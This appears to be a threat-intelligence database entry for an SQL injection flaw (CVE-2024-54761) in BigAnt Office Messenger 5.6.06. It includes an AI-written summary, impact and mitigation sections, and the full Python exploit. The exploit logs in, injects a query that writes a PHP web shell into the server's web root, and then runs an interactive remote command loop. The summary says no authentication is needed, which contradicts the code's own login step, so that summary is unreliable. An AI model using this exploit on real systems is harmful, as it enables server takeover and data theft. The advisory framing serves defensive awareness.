BigAnt Office Messenger 5.6.06 - SQL Injection
BigAnt Office Messenger 5.6.06 - SQL Injection
AI Analysis
Technical Summary
The reported security threat concerns an SQL Injection vulnerability in BigAnt Office Messenger version 5.6.06. SQL Injection (SQLi) is a critical web application security flaw that allows an attacker to manipulate backend SQL queries by injecting malicious input through user-controllable parameters. In this case, the vulnerability affects BigAnt Office Messenger, a communication platform used primarily in corporate environments for instant messaging and collaboration. The exploit allows an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access, data modification, or even complete compromise of the database server. The presence of exploit code written in Python indicates that the vulnerability can be programmatically exploited, facilitating automated attacks. Although the affected versions are not explicitly listed, the specific mention of version 5.6.06 suggests that this version is vulnerable. The absence of patch links implies that no official fix has been publicly released at the time of reporting. The exploit does not require authentication or user interaction, increasing its risk profile. Given that BigAnt Office Messenger is a web-based application, the attack surface includes any exposed web interfaces handling user input without proper sanitization or parameterization of SQL queries.
Potential Impact
For European organizations, the impact of this SQL Injection vulnerability can be significant. BigAnt Office Messenger is often deployed in enterprise environments for internal communication, meaning that exploitation could lead to unauthorized access to sensitive corporate data, including employee communications, credentials, and potentially other integrated systems. This could result in data breaches violating GDPR regulations, leading to legal penalties and reputational damage. Furthermore, attackers could manipulate or delete data, disrupt communication services, or use the compromised system as a foothold for lateral movement within the network. The medium severity rating suggests that while the vulnerability is exploitable, the extent of damage depends on the database privileges and network segmentation. However, the availability of public exploit code increases the likelihood of exploitation attempts, especially by less sophisticated attackers.
Mitigation Recommendations
Organizations using BigAnt Office Messenger 5.6.06 should immediately assess their exposure and implement the following mitigations: 1) Conduct a thorough audit of all input fields and web interfaces to identify and remediate SQL Injection vulnerabilities by employing parameterized queries or prepared statements. 2) If an official patch becomes available, prioritize its deployment. 3) Implement Web Application Firewalls (WAFs) with rules specifically designed to detect and block SQL Injection attempts targeting BigAnt Office Messenger. 4) Restrict database user privileges to the minimum necessary to limit the impact of a successful injection. 5) Monitor logs for unusual database query patterns or error messages indicative of injection attempts. 6) Segment the network to isolate the messaging server from critical infrastructure. 7) Educate IT staff about this vulnerability and the importance of input validation and secure coding practices to prevent similar issues in the future.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland
Indicators of Compromise
- exploit-code: # Exploit Title: BigAnt Office Messenger 5.6.06 - SQL Injection # Date: 01.09.2025 # Exploit Author: Nicat Abbasov # Vendor Homepage: https://www.bigantsoft.com/ # Software Link: https://www.bigantsoft.com/download.html # Version: 5.6.06 # Tested on: 5.6.06 # CVE : CVE-2024-54761 # Github repo: https://github.com/nscan9/CVE-2024-54761 import requests from bs4 import BeautifulSoup import base64 class Exploit: def __init__(self, rhost, rport=8000, username='admin', password='123456'): self.rhost = rhost self.rport = rport self.username = username.lower() self.password = password self.target = f'http://{self.rhost}:{self.rport}' self.session = requests.Session() self.headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0', 'X-Requested-With': 'XMLHttpRequest', 'Origin': self.target, 'Referer': f'{self.target}/index.php/Home/login/index.html', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', } self.clientid_map = { 'admin': '1', 'security': '2', 'auditor': '3', 'superadmin': '4', } self.clientid = self.clientid_map.get(self.username, '4') # Default to 4 if unknown def get_tokens(self): print("[*] Fetching login page tokens...") url = f'{self.target}/index.php/Home/login/index.html' r = self.session.get(url, headers={'User-Agent': self.headers['User-Agent']}) soup = BeautifulSoup(r.text, 'html.parser') tokens = {} meta = soup.find('meta', attrs={'name': '__hash__'}) if meta: tokens['__hash__'] = meta['content'] form = soup.find('form') if form: for hidden in form.find_all('input', type='hidden'): name = hidden.get('name') value = hidden.get('value', '') if name and name not in tokens: tokens[name] = value return tokens def login(self): tokens = self.get_tokens() if '__hash__' in tokens: tokens['__hash__'] = tokens['__hash__'] encoded_password = base64.b64encode(self.password.encode()).decode() data = { 'saas': 'default', 'account': self.username, 'password': encoded_password, 'to': 'admin', 'app': '', 'submit': '', } data.update(tokens) login_url = f'{self.target}/index.php/Home/Login/login_post' print(f"[*] Logging in as {self.username}...") resp = self.session.post(login_url, headers=self.headers, data=data) if resp.status_code != 200: print(f"[-] Login failed with HTTP {resp.status_code}") return False try: json_resp = resp.json() if json_resp.get('status') == 1: print("[+] Login successful!") return True else: print(f"[-] Login failed: {json_resp.get('info')}") return False except: print("[-] Failed to parse login response JSON") return False def check_redirect(self): url = f'{self.target}/index.php/admin/public/load/clientid/{self.clientid}.html' print(f"[*] Checking for redirect after login to clientid {self.clientid} ...") r = self.session.get(url, headers={'User-Agent': self.headers['User-Agent']}, allow_redirects=False) if r.status_code == 302: print(f"[+] Redirect found to {r.headers.get('Location')}") return True else: print(f"[-] Redirect not found, got HTTP {r.status_code}") return False def upload_shell(self): print("[*] Uploading webshell via SQLi...") payload = ';SELECT "<?php system($_GET[\'cmd\']); ?>" INTO OUTFILE \'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php\'-- -' url = f'{self.target}/index.php/Admin/user/index/clientid/{self.clientid}.html' params = {'dev_code': payload} r = self.session.get(url, params=params, headers={'User-Agent': self.headers['User-Agent']}) if r.status_code == 200: print("[+] Payload sent, checking the shell...") self.check_shell() else: print(f"[-] Failed to send payload, HTTP {r.status_code}") def check_shell(self): print("[*] Enter shell commands to execute on the target. Empty command to exit.") while True: cmd = input("shell> ").strip() if not cmd: print("[*] Exiting shell.") break shell_url = f'{self.target}/shell.php?cmd={cmd}' print(f"[*] Sending command: {cmd}") r = self.session.get(shell_url) if r.status_code == 200 and r.text.strip(): print(r.text.strip()) else: print("[-] No response or empty output from shell.") def run(self): if self.login(): if self.check_redirect(): self.upload_shell() else: print("[-] Redirect check failed, aborting.") else: print("[-] Login failed, aborting.") if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description='Exploit for CVE-2024-54761 BigAntSoft SQLi to RCE') parser.add_argument('-r', '--rhost', required=True, help='Target IP address') parser.add_argument('-p', '--rport', default=8000, type=int, help='Target port (default 8000)') parser.add_argument('-u', '--username', default='admin', help='Login username (default admin)') parser.add_argument('-P', '--password', default='123456', help='Login password in plain text') args = parser.parse_args() exploit = Exploit(args.rhost, args.rport, args.username, args.password) exploit.run()
BigAnt Office Messenger 5.6.06 - SQL Injection
Description
BigAnt Office Messenger 5.6.06 - SQL Injection
AI-Powered Analysis
Technical Analysis
The reported security threat concerns an SQL Injection vulnerability in BigAnt Office Messenger version 5.6.06. SQL Injection (SQLi) is a critical web application security flaw that allows an attacker to manipulate backend SQL queries by injecting malicious input through user-controllable parameters. In this case, the vulnerability affects BigAnt Office Messenger, a communication platform used primarily in corporate environments for instant messaging and collaboration. The exploit allows an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access, data modification, or even complete compromise of the database server. The presence of exploit code written in Python indicates that the vulnerability can be programmatically exploited, facilitating automated attacks. Although the affected versions are not explicitly listed, the specific mention of version 5.6.06 suggests that this version is vulnerable. The absence of patch links implies that no official fix has been publicly released at the time of reporting. The exploit does not require authentication or user interaction, increasing its risk profile. Given that BigAnt Office Messenger is a web-based application, the attack surface includes any exposed web interfaces handling user input without proper sanitization or parameterization of SQL queries.
Potential Impact
For European organizations, the impact of this SQL Injection vulnerability can be significant. BigAnt Office Messenger is often deployed in enterprise environments for internal communication, meaning that exploitation could lead to unauthorized access to sensitive corporate data, including employee communications, credentials, and potentially other integrated systems. This could result in data breaches violating GDPR regulations, leading to legal penalties and reputational damage. Furthermore, attackers could manipulate or delete data, disrupt communication services, or use the compromised system as a foothold for lateral movement within the network. The medium severity rating suggests that while the vulnerability is exploitable, the extent of damage depends on the database privileges and network segmentation. However, the availability of public exploit code increases the likelihood of exploitation attempts, especially by less sophisticated attackers.
Mitigation Recommendations
Organizations using BigAnt Office Messenger 5.6.06 should immediately assess their exposure and implement the following mitigations: 1) Conduct a thorough audit of all input fields and web interfaces to identify and remediate SQL Injection vulnerabilities by employing parameterized queries or prepared statements. 2) If an official patch becomes available, prioritize its deployment. 3) Implement Web Application Firewalls (WAFs) with rules specifically designed to detect and block SQL Injection attempts targeting BigAnt Office Messenger. 4) Restrict database user privileges to the minimum necessary to limit the impact of a successful injection. 5) Monitor logs for unusual database query patterns or error messages indicative of injection attempts. 6) Segment the network to isolate the messaging server from critical infrastructure. 7) Educate IT staff about this vulnerability and the importance of input validation and secure coding practices to prevent similar issues in the future.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52412
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for BigAnt Office Messenger 5.6.06 - SQL Injection
# Exploit Title: BigAnt Office Messenger 5.6.06 - SQL Injection # Date: 01.09.2025 # Exploit Author: Nicat Abbasov # Vendor Homepage: https://www.bigantsoft.com/ # Software Link: https://www.bigantsoft.com/download.html # Version: 5.6.06 # Tested on: 5.6.06 # CVE : CVE-2024-54761 # Github repo: https://github.com/nscan9/CVE-2024-54761 import requests from bs4 import BeautifulSoup import base64 class Exploit: def __init__(self, rhost, rport=8000, username='admin', password='123456'):... (5537 more characters)
Threat ID: 68a3d92dad5a09ad00eed720
Added to database: 8/19/2025, 1:53:49 AM
Last enriched: 10/4/2025, 12:50:16 AM
Last updated: 10/4/2025, 12:53:50 AM
Views: 35
Related Threats
ThreatsDay Bulletin: CarPlay Exploit, BYOVD Tactics, SQL C2 Attacks, iCloud Backdoor Demand & More
HighNuclei Templates for Detecting AMI MegaRAC BMC Vulnerabilities
MediumHackers Exploit Milesight Routers to Send Phishing SMS to European Users
HighSoftware Secured | Hacking Furbo 2: Mobile App and P2P Exploits | USA
MediumResearchers Disclose Google Gemini AI Flaws Allowing Prompt Injection and Cloud Exploits
HighActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.